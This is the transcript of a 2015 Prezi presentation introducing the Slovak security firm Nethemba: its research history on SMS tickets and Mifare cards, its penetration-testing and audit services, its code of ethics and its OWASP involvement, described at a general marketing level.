Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

Nethemba company introduction

Nethemba www.nethemba.com company presentation
by

Pavol Luptak

on 15 July 2015

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Nethemba company introduction

Nethemba company introduction
Nethemba history
2007 Slovak company was created
2008 Research: SMS public transport ticket vulnerabilities
2009 Research: Implementation of Mifare Classic cracker
2010 Co-organization of CONFidence security conference in Prague
2010 Research: SMS parking ticket vulnerabilities
2013 Launch of "Digital privacy enhancing service" ( "Chránte svoje súkromie ")
2014 Austrian daughter company Nethemba GmbH was created
2014 Organizing CypherConf security conference in Bratislava (together with ESET and Probin)
Nethemba - Who We Are?
10 computer security experts (penetration testers, security consultant, social engineers, ...) from Slovakia and UK
Established in Central Europe covering German-speaking market through Nethemba GmbH
Holders of renowned security certifications including CISSP (Certified Information System Security Professional), CEH (Certified Ethical Hacker), SCSecA (Sun Certified Security Administrator), CCNP Security, CCSP (Cisco Certified Security Professional), ...
Communities support
Sponsorship of public security research (financially supporting of open-source IT security projects)
Artistic project (secondrealm.is)
Economical projects (Conservative Institute of M.R.Štefánik)
Progressbar hackerspace in Bratislava
Parallel Polis hackerspace in Prague
Research: Public transport SMS ticket hacking
In 2008 revealed a serious inherent vulnerabilities in public transport SMS tickets
We contacted public transport companies in Prague, Bratislava, Vienna, but they decided not to fix this vulnerabilities
Few years after first implementations (e.g. FareBandit) were appeared
Paper available at http://www.nethemba.com/SMS-ticket-hack4.pdf
Research: Implementation of Mifare Classic cracker
In 2009 we demonstrated critical vulnerabilities in RFID smartcards massively used Slovakia and Czech republic (public transport, Czech/Slovak rails and buses, parking cards, ...)
Released the first world's implementation of Mifare Classic cracker (as opensource) capable to crack all keys to all sector for 1 billion of Mifare cards (!) in a few minutes
Paper available at http://www.nethemba.com/mifare-classic-slides.pdf
Research: SMS parking ticket vulnerabilities
In 2010 we revealed critical vulnerabilities in SMS mobile parking
All big cities (including Bratislava and Košice) were affected
We waited few years the service provide could fix this vulnerability
Paper available at http://www.nethemba.com/SMS-parking-hack.pdf
Digital privacy enhancing service "Chráňtesvojesúkromie.sk"
For Slovak and Czech customers we started to offer digital privacy enhancing services:
end-to-end encrypted calls (including design and implementation of call centers)
end-to-end encrypted emails, chat, SMS text communication
full disk encryption (including mobile phones)
desktop / mobile security hardening
For more information see http://www.chrantesvojesukromie.sk or http://www.chrantesvesoukromi.cz
On Tuesday 4.11.2014 we are organizing the first practical IT security conference in Bratislava
Our core business
All kinds of penetration tests
Comprehensive web application security audits
Mobile application security audits (iOS, Android, Windows Phone, Blackberry)
Local system, wireless security audits, social engineering
Computer forensic analysis
Professional IT security training & courses
Design and development of secure VoIP solutions
Systems hardening, HA/LB cloud computing
Our specialties
Smart card (RFID) security audits
Hardware firmware reverse engineering and security audit
SAP system penetration tests and security audits
Security research in many areas
Code of Ethics
We strictly follow the rules of responsible vulnerability disclosure (and always contact affected vendors few months before)
We follow the Code of Ethics (not only because we are CISSPs and CEHs)
We strongly respect mutual NDAs and security assessment contracts
We DO NOT work for the government and government institutions due to various ethical and economical reasons
OWASP involvement
OWASP (Open Web Application Security Project) – the biggest and most respected free and open application security community
We are OWASP Testing Guide v3 and v4 (the best web application security testing guide) contributors
Our employees are OWASP chapter leaders for Slovakia attending many OWASP security conferences / trainings
Penetration tests
A method of evaluating the security of a computer system or network by simulating an attack by a malicious hacker
Involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities and exploitation
OSSTMM methodology or OWASP Testing Guide is used
Penetration test approaches
Black box
- a zero-knowledge attack - no relevant information about the target environment is provided, the most realistic external penetration test
White box
- a full-knowledge attack - all the security information related to an environment and infrastructure is considered
Grey box
- a partial-knowledge attack
Penetration test phases
Discovery
- information about the target system is identified and documented (WHOIS service, public search engines, domain registrators, etc.)
Enumeration
- using intrusive methods and techniques to gain more information about the target system (port scanning, fingerprinting)
Vulnerability mapping
- mapping the findings from the enumeration to known and potential vulnerabilities
Exploitation
- attempting to gain access through vulnerabilities identified in the vulnerability-mapping phase. The goal is to gain user-level and privileged (administrator) access to the system (custom exploit scripts or exploit frameworks are used)
Standard Web Application Test
The goal of the standard penetration test is to reveal as much as possible the most critical security vulnerabilities in the web application / web server during 3 days, exploit them and gain a privileged access if it is possible
Reveals the most serious vulnerabilities (SQL/LDAP injections, XSS/CSRF, buffer overflows, business logical flaws, authentication bypass, local file inclusions)
Due to the fact that a manual inspection is used, the test is highly recommended when you automatized security scanners have already failed
Technical report with executive summary, all revealed vulnerabilities, risk levels and recommendations
Comprehensive Web Application Audit
The most comprehensive and deepest web application audit on the market
Strictly follows the OWASP Testing Guide v4
Practical hacking demonstration (writing exploit codes, database dump, XSS/CSRF demonstration etc)
One-day meeting with application's developers
Comprehensive report in English/Czech/Slovak
It takes 2-4 weeks per one application
Smartphone Security Audit
Smartphone security audit system involves a technical security audit of the mobile application itself and appropriate server web services (REST / SOAP).
During testing we follow the OWASP Mobile Security Project mainly focusing on the Top Ten Mobile Controls
Suitable for any company that develops or operates its own mobile applications
Testing time: 1-3 weeks depending on the complexity
References
Financial sector
- banking groups, banks and insurance companies in Austria, Czech Republic and Slovakia

Telco sector
- telecommunications and mobile operators in Czech Republic and Slovakia

Other corporations
- transport, energy, development companies, e-shops, online casinos, .. in USA and Central Europe
Used tools and methodologies
We strictly follow OSSTMM and OWASP Testing Guide
We use many commercial and opensource tools
We develop own ones (NSQL – time delay blind SQL injector)
We use manual inspection and can reveal many critical security vulnerabilities that automated tools do not
Full transcript